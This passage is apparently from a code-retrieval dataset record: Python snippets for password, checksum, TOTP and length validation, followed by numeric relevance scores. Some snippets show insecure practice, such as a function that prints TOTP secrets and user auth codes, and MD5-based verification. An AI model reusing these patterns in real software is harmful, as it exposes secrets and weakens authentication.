test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def code_verifier(n_bytes=64):\n verifier = base64.urlsafe_b64encode(os.urandom(n_bytes)).rstrip(b'=')\n # https://tools.ietf.org/html/rfc7636#section-4.1\n # minimum length of 43 characters and a maximum length of 128 characters.\n if len(verifier) < 43:\n raise ValueError(\"Verifier too short. n_bytes must be > 30.\")\n elif len(verifier) > 128:\n raise ValueError(\"Verifier too long. n_bytes must be < 97.\")\n else:\n return verifier", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def verify_code(email, val):\r\n # TODO: is this the right string?\r\n verification_string = email.lower() + '|' + val\r\n return hashlib.md5(verification_string).hexdigest()", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def 
len12(self, len): # -> None:\n ...", "def validate_code(request):\n user_id = api.keystone.get_user_id(request)\n print \"USER CHECK\"\n print user_id\n user = api.keystone.user_get(request, user_id)\n user_auth_code = request.GET.get('auth_code', None)\n secret = request.GET.get('secret', None)\n\n #Generate a code form our side using algorithm and use it to validate\n generated_code = api.keystone.generate_totp(secret)\n\n print secret\n print user_auth_code\n print generated_code\n print 'entering code comparison'\n \n data = {}\n extra = {}\n\n #Code comparison\n if user_auth_code == generated_code:\n data['totp_authenticated'] = True\n extra['two_factor_enabled'] = True\n\textra['secret_key'] = secret\n api.keystone.enable_2fa(request, user, **extra)\n else:\n \tprint 'falseeeeee'\n data['totp_authenticated'] = False\n return JsonResponse(data)", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def number_len(password_length):\r\n while True:\r\n numb_length = input('How much numbers you want in password? 
At least 1 : ')\r\n try:\r\n numb_length = int(numb_length)\r\n if 1 <= numb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(numb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(numb_length))\r\n return numb_length", "def test_long_string_positive_length(self):\n self.failUnlessEqual(self.callFunc('encode_longstr', 'hello world'), '\\x00\\x00\\x00\\x0bhello world', 'positive length long string encoding FAILED...')", "def test_allowed_chars(self):\n hash_val = self.reverse_hash.get_hash('123')\n self.assertEqual(hash_val['error'], 'allowed chars {}'.format(self.reverse_hash.letters))", "def CheckZipCode(zipcode):\n # see if there are enough digits\n if (len(zipcode) >= 5):\n # check if numerical\n try:\n int(zipcode)\n return True\n except:\n return False\n else:\n return False", "def _validate_instruction_code_23E(self, val):\n validate_instruction_code(val)\n return val", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def check_ean(eancode):\n if not eancode:\n return True\n if len(eancode) <> 13:\n return False\n try:\n int(eancode)\n except:\n return False\n return ean_checksum(eancode) == int(eancode[-1])", "def validate(info):\n\n\tif info == \"\": \n\t\treturn False\n\telse:\n\t\tif len(info) < 5 or len(info) > 32:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True", "def test_encodes_short_string(self):\n result = encode_run_length(\"AAABBBRYUIWW\")\n self.assertEqual(result, \"3A3B1R1Y1U1I2W\")", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def length(value):\n\n # Try to return the length\n return len(value)", "def len23(self, len): # -> None:\n ...", "def is_valid_control_number(id_code: str) -> bool:\n check_numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 1]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == 10:\n check_numbers = [3, 4, 5, 6, 7, 8, 9, 1, 2, 3]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == int(id_code[-1]):\n return True\n return False", "def test_valid_length(self):\n f = lws.valid_length\n assert f('', [1]) is True\n assert f('+', [1, 1]) is True\n assert f('+', []) is False\n assert f('?', []) is True\n assert f('?', [1]) is True\n assert f('?', [1, 1]) is False\n assert f('?', [1, 1, 1]) is False\n assert f('*', []) is True\n assert f('*', [1, 1, 1]) is True", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def validate_uuid(self, 
uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')", "def test_cpf_has_11_digits(self):\r\n form = self.make_validated_form(cpf='1234')\r\n self.assertFormErrorCode(form, 'cpf', 'length')", "def validate(code):\n if not code.isdigit():\n raise IllegalCharacterError('[0-9]{%d}' % UPCA.digits)\n\n if len(code) != UPCA.digits:\n raise ValueError('Bar code %s requires %d digits' % (code, UPCA.digits))\n\n checksum = UPCA.calculate_checksum(code)\n if checksum != int(code[-1]):\n raise ValueError('Checksum character mismatch %s != %s' % (checksum, code[-1]))", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def getLength(message):\r\n length = 0\r\n for char in message:\r\n if char in alphaUpper or alphaLower:\r\n length += 1\r\n return length", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def password_strength(self, password_info):\n\n # Check for digits in the password\n digit_error = re.search(r\"\\d\", password_info) is None\n\n # Check for uppercase characters in the password\n uppercase_error = re.search(r\"[A-Z]\", password_info) is None\n\n # Check for lowercase characters in the password\n lowercase_error = re.search(r\"[a-z]\", password_info) is None\n\n # Check the condition of the password\n password_condition = not(\n digit_error or\n uppercase_error or\n lowercase_error\n )\n\n return password_condition # return the condition of the password", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. 
\n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def ospf_lsa_checksum(lsa):\n return fletcher16_checkbytes(b\"\\x00\\x00\" + lsa[2:], 16) # leave out age", "def verify(self, code) -> bool:\n totp = self.__initialize_totp()\n return totp.verify(code)", "def url_contains_auth_code(url: str) -> bool:\n return url.count(\"code=\") == 1", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def verify(self, k, code, counter = -1, window=30, allowed_steps=2):\n # if counter == -1:\n # verifycode = self.hotp(k, counter)\n # else:\n for i in range(0, allowed_steps + 1):\n c = hex(int((time.time() - i * window) // window))[2:]\n while len(c) < 16:\n c = \"0\" + c\n\n verifycode = self.totp(k, c, window=window)\n if code == verifycode:\n return True\n return False" ]
[ "0.6570652", "0.65147936", "0.6507782", "0.636752", "0.6305414", "0.6304687", "0.62863815", "0.6257223", "0.6186307", "0.6163863", "0.61181813", "0.6054365", "0.5972026", "0.5970523", "0.59098756", "0.5856316", "0.58449227", "0.58319175", "0.58306134", "0.5820003", "0.57585216", "0.57269144", "0.5714411", "0.570993", "0.5708055", "0.570669", "0.5699649", "0.5694657", "0.5692152", "0.56766814", "0.56750864", "0.56735575", "0.5671589", "0.56712943", "0.56587887", "0.56399494", "0.5634607", "0.56309503", "0.5607847", "0.55891645", "0.5580185", "0.55771244", "0.5569683", "0.5568241", "0.5557203", "0.5557203", "0.5524747", "0.5521789", "0.5514045", "0.5514045", "0.5510478", "0.55092525", "0.55065507", "0.5478073", "0.547748", "0.5475223", "0.5468194", "0.54677594", "0.5465956", "0.5464781", "0.546441", "0.54578143", "0.54528254", "0.54462945", "0.54236984", "0.54098666", "0.53894883", "0.53850216", "0.5383557", "0.53703123", "0.5362179", "0.5354814", "0.5351773", "0.5350478", "0.5349091", "0.5348848", "0.53487664", "0.53428566", "0.53428036", "0.5342495", "0.5336524", "0.5331083", "0.5330924", "0.5330855", "0.53306276", "0.5324838", "0.5318119", "0.5318103", "0.53176796", "0.53068185", "0.5301469", "0.53002256", "0.52972865", "0.5294435", "0.5291588", "0.5290235", "0.52751344", "0.52741945", "0.5267926", "0.5265282", "0.526437" ]
0.0
-1
Check length of SecureCode (SecureCode= 1234 )
def test_39(self): assert 'True' == Api.requestBlock('test-39')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def check_digit(raw_code):\n s = 
sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def __len__(self):\n return len(self.code)", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def __len__(self):\n return self.cli.passwords.len()", "def is_private(code):\n return 4000 <= code <= 4999", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def is_reserved(code):\n return 1000 <= code <= 2999", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def SecondPart():\n return passwordChecker(data)", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def validate_password(data):\n\n if \"password\" not in data:\n return 
False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def checksum(code):\n return sum(code) % 256", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def test_luhn_checksum(self):\n check_digit = calculate_luhn(\"7992739871\")\n assert check_digit == 3", "def strlen(val): \n return len(val)", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def is_valid_control_number(id_code: str) -> bool:\n sum = 1 * int(id_code[:1]) + 2 * int(id_code[1:2]) + 3 * int(id_code[2:3]) + 4 * int(id_code[3:4]) + 5 * \\\n int(id_code[4:5]) + 6 * int(id_code[5:6]) + 7 * int(id_code[6:7]) + 8 * int(id_code[7:8]) + 9 *\\\n int(id_code[8:9]) + 1 * int(id_code[9:10])\n control_number = sum % 11\n if int(control_number) == int(id_code[10:11]):\n return True\n elif int(control_number) == 10:\n sum = 3 * int(id_code[:1]) + 4 * int(id_code[1:2]) + 5 * int(id_code[2:3]) + 6 * int(id_code[3:4]) + 7 * \\\n int(id_code[4:5]) + 8 * int(id_code[5:6]) + 9 * int(id_code[6:7]) + 1 * int(id_code[7:8]) + 2 * \\\n int(id_code[8:9]) + 3 * int(id_code[9:10])\n control_number = sum % 11\n if control_number == int(id_code[10:11]):\n return True\n elif control_number == 10:\n if int(id_code[10:11]) == 0:\n return True\n else:\n return False\n else:\n return False", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = 
requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'lg': language})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('lg')", "def _get_checksum(code: str) -> int:\r\n total = 0\r\n\r\n for index, digit in enumerate(code):\r\n digit = int(digit)\r\n if (index + 1) % 2 != 0:\r\n digit *= 2\r\n if digit > 9:\r\n digit -= 9\r\n total += digit\r\n\r\n checksum = 10 - total % 10\r\n\r\n return checksum if checksum != 10 else 0", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n if secure_val == make_secure_val(val):\n return val", "def test_invalid_luhn(self):\n assert luhn_checksum(\"79927398714\") != 0", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def number_len(password_length):\r\n while True:\r\n numb_length = input('How much numbers you want in password? 
At least 1 : ')\r\n try:\r\n numb_length = int(numb_length)\r\n if 1 <= numb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(numb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(numb_length))\r\n return numb_length", "def len12(self, len): # -> None:\n ...", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def checkZipCode(data):\n if len(data) < 5:\n while len(data) < 5:\n data = '0' + data\n elif len(data) > 5:\n data = data[0:4]\n # print(data)\n return (data)", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. 
\n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def CheckZipCode(zipcode):\n # see if there are enough digits\n if (len(zipcode) >= 5):\n # check if numerical\n try:\n int(zipcode)\n return True\n except:\n return False\n else:\n return False", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def test_cpf_has_11_digits(self):\r\n form = self.make_validated_form(cpf='1234')\r\n self.assertFormErrorCode(form, 'cpf', 'length')", "def is_valid_control_number(id_code: str) -> bool:\n check_numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 1]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == 10:\n check_numbers = [3, 4, 5, 6, 7, 8, 9, 1, 2, 3]\n check_sum = 0\n for i in range(10):\n check_sum += int(id_code[i]) * check_numbers[i]\n check_sum = check_sum % 11\n if check_sum == int(id_code[-1]):\n return True\n return False", "def test_encodes_short_string(self):\n result = encode_run_length(\"AAABBBRYUIWW\")\n self.assertEqual(result, \"3A3B1R1Y1U1I2W\")", "def valid_serial_key(serial_key):\n parts = serial_key.split('-')\n if len(parts) != 5:\n return False\n\n for part in parts:\n if not re.match('[A-Z0-9]{5}$', part):\n return False\n\n return True", "def strlen(self, tuple_data, val):\r\n return len(val)", "def strlen(self, tuple_data, val):\r\n return len(val)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif 